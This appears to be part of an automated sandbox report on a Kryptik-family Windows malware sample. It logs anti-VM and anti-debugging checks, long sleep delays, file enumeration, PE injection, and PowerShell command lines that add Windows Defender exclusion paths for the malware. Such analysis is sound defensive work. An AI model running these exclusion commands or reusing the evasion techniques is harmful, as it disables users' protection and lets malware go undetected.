                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7356, type: MEMORYSTR
                    Delayed program exit found
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040F7E2 Sleep,ExitProcess,15_2_0040F7E2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: 2320000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: 44F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: 9C00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: 9E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: AE20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: B570000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: 3310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: 5310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: A630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: A840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: B840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: C220000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05311230 rdtsc 10_2_05311230
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_0041A7D9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8723Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 617Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7597Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 382Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeWindow / User API: threadDelayed 6500Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeWindow / User API: threadDelayed 2984Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeAPI coverage: 6.1 %
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeAPI coverage: 9.6 %
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 5416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 8723 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep count: 617 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7344Thread sleep count: 197 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7344Thread sleep time: -98500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7348Thread sleep count: 6500 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7348Thread sleep time: -19500000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7348Thread sleep count: 2984 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe TID: 7348Thread sleep time: -8952000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10006580 FindFirstFileExA,9_2_10006580
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040928E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C322
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C388
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004096A0
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00408847
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00407877 FindFirstFileW,FindNextFileW,15_2_00407877
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0044E8F9 FindFirstFileExA,15_2_0044E8F9
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB6B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419B86
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD72
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407CD2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00418981 memset,GetSystemInfo,17_2_00418981
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487991332.00000000011B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05311230 rdtsc 10_2_05311230
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_100060E2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CBE1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10004AB4 mov eax, dword ptr fs:[00000030h]9_2_10004AB4
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00443355 mov eax, dword ptr fs:[00000030h]15_2_00443355
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_1000724E GetProcessHeap,9_2_1000724E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_100060E2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_10002639
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10002B1C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0043503C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00434A8A
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043BB71
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00434BD8 SetUnhandledExceptionFilter,15_2_00434BD8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMemory written: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe base: 400000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: NULL target: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: NULL target: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: NULL target: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe protection: execute and read and writeJump to behavior
